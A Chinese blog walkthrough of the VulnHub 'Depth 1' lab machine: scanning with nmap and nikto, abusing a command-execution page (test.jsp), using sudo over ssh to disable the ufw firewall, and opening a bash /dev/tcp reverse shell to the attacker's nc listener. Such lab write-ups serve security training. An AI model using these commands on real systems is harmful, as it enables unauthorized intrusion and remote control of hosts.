命令执行靶场实战


环境准备

靶场下载地址:https://www.vulnhub.com/entry/depth-1,213/
使用Vmware虚拟机中NAT网络
靶机: 192.168.146.153
攻击机 parrot 192.168.146.129


提示:以下是本篇文章正文内容,下面案例可供参考

一、信息搜集

1、nmap扫描

-A全面扫描
-p-全端口扫描

nmap -A -p- 192.168.146.153 

发现只有开放了8080端口
在这里插入图片描述
浏览一下8080端口
在这里插入图片描述

2、使用nikto扫描网站目录

nikto 是一款用来发现 web 应用程序漏洞的一个工具,常用于对web网页服务器进行全面的多种扫描

利用nikto扫描该站点8080端口

nikto -h http://192.168.146.153:8080

发现一个敏感目录👇test.jsp
在这里插入图片描述
点进去访问
可能存在远程命令执行漏洞
在这里插入图片描述
【至此本靶机的信息搜集基本完成】

二、漏洞利用测试

uname -a

成功获取操作系统信息,有回显
在这里插入图片描述
查看home目录下的用户

ls -la /home

发现bill这个用户👇
在这里插入图片描述
继续深入刺探

ls -la /home/bill

考虑是否开启了ssh服务
在这里插入图片描述
查看进程

ps -aux

发现确实开启了ssh服务,但是之前信息搜集阶段nmap没用扫到,猜测可能有防火墙

在这里插入图片描述
在/etc/目录中发现防火墙
在这里插入图片描述
利用ssh执行root权限命令查看回显是否可以使用
补:sudo -l 列出超级用户可执行与无法执行的指令

ssh bill@localhost sudo -l

成功↓
在这里插入图片描述
接着关闭防火墙

ssh bill@localhost sudo ufw disable

在这里插入图片描述

三、nc反弹shell

parrot上先开启4444号端口监听

nc -lvp 4444

利用命令执行漏洞进行nc连接

ssh bill@localhost sudo bash -i >& /dev/tcp/192.168.146.129/4444 0>&1

在这里插入图片描述
nc成功反弹shell
在这里插入图片描述
拿到flag值
在这里插入图片描述
完成,收工😄

  • 1
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值